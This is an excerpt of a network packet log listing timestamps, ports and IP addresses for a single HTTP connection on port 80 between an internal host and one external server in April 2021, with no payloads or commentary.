Apr 12, 2021 11:34:50.609222889 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.609285116 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.609288931 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.609329939 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.609332085 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.609431028 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.609492064 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.609642029 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.609707117 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.609734058 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.609757900 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.609766960 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.609772921 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.609802961 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.609812975 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.609832048 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.609853983 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.609858990 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.609869003 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.609884977 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.609910011 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.609921932 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.609936953 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.609950066 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.609962940 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.609986067 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.609994888 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.610001087 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.610024929 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.610045910 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.610049963 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.610059023 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.610076904 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.610093117 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.610102892 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.610125065 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.610127926 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.610153913 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.610155106 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.610179901 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.610181093 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.610205889 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.610213041 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.610223055 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.610244036 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.610270977 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.610284090 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.610297918 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.610308886 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.610326052 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.610336065 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.610352993 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.610363960 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.610380888 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.610390902 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.610407114 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.610419035 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.610440016 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.610445023 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.610469103 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.610481024 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.610497952 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.610524893 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.610536098 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.610553026 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.610563993 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.610579967 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.610593081 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.610609055 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.610620975 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.610635996 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.610698938 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.610706091 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.610724926 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.610754967 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.610780954 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.610793114 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.610809088 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.610820055 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.610837936 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.610862970 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.610878944 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.610888004 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.610888958 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.610898018 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.610914946 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.610918045 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.610946894 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.610975981 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.610986948 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.611001968 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.611005068 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.611028910 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.611054897 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.611063004 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.611079931 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.611105919 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.611114979 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.611130953 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.611139059 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.611161947 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.611191034 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.611201048 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.611217976 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.611226082 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.611243963 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.611269951 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.611279964 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.611294985 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.611320972 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.611332893 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.611346006 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.611356020 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.611377954 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.611406088 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.611416101 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.611432076 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.611447096 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.611458063 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.611469984 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.611485958 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.611510992 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.611531019 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.611537933 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.611552954 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.611563921 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.611578941 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.611596107 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.611604929 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.611625910 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.611639977 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.611650944 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.611669064 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.611679077 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.611691952 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.611704111 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.611764908 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.611783028 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.611812115 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.611838102 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.611846924 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.611869097 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.611869097 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.611897945 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.611922026 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.611931086 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.611948967 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.611974001 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.611984015 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.611998081 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.611999035 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.612025023 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.612050056 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.612065077 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.612080097 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.612082005 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.612111092 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.612118959 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.615652084 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.747648954 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.747734070 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.747773886 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.747812986 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.747888088 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.747912884 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.749841928 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.749881983 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.749922037 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.749938011 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.749960899 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.749978065 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.749998093 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.750011921 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.750036955 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.750049114 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.750076056 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.750087023 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.750119925 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.750123024 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.750164986 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.750164986 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.750202894 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.750209093 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.750241995 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.750241995 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.750279903 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.750282049 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.750317097 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.750317097 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.750355005 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.750355005 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.750392914 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.750394106 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.750431061 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.750438929 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.750478029 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.750480890 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.750520945 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.750521898 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.750559092 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.750560045 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.750598907 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.750602961 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.750634909 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.750637054 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.750674009 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.750700951 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.750711918 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.750721931 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.750749111 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.750757933 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.750788927 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.750799894 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.750806093 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.750837088 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.750849962 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.750881910 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.750881910 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.750921011 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.750921965 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.750958920 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.750960112 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.750998974 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.750998974 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.751036882 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.751038074 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.751075983 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.751085043 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.751126051 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.751127958 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.751166105 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.751167059 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.751205921 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.751205921 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.751245022 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.751246929 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.751282930 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.751285076 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.751319885 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.751321077 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.751358986 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.751369953 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.751410961 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.751416922 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.751457930 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.751458883 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.751496077 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.751497984 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.751537085 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.751542091 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.751573086 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.751575947 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.751611948 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.751611948 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.751650095 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.751651049 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.751688957 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.751689911 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.751725912 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.751735926 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.751775026 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.751777887 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.751817942 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.751817942 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.751852989 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.751856089 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.751890898 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.751893997 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.751930952 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.751931906 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.751969099 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.751971006 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.752007961 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.752012014 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.752043962 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.752054930 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.752091885 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.752095938 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.752132893 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.752166986 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.752170086 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.752208948 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.752221107 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.752224922 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.752247095 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.752247095 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.752283096 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.752285957 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.752321959 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.752324104 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.752358913 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.752371073 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.752407074 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.752412081 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.752448082 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.752449036 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.752482891 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.752486944 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.752526999 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.752531052 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.752562046 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.752563953 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.752598047 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.752602100 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.752636909 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.752639055 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.752674103 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.752685070 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.752722979 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.752727032 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.752760887 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.752763987 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.752799988 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.752801895 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.752835035 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.752840042 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.752875090 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.752876043 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.752912998 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.752914906 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.752948999 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.752952099 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.752986908 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.752998114 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.753036976 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.753041029 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.753077030 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.753077984 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.753115892 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.753120899 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.753150940 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.753153086 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.753189087 CEST	49165	80	192.168.2.22	198.23.213.61
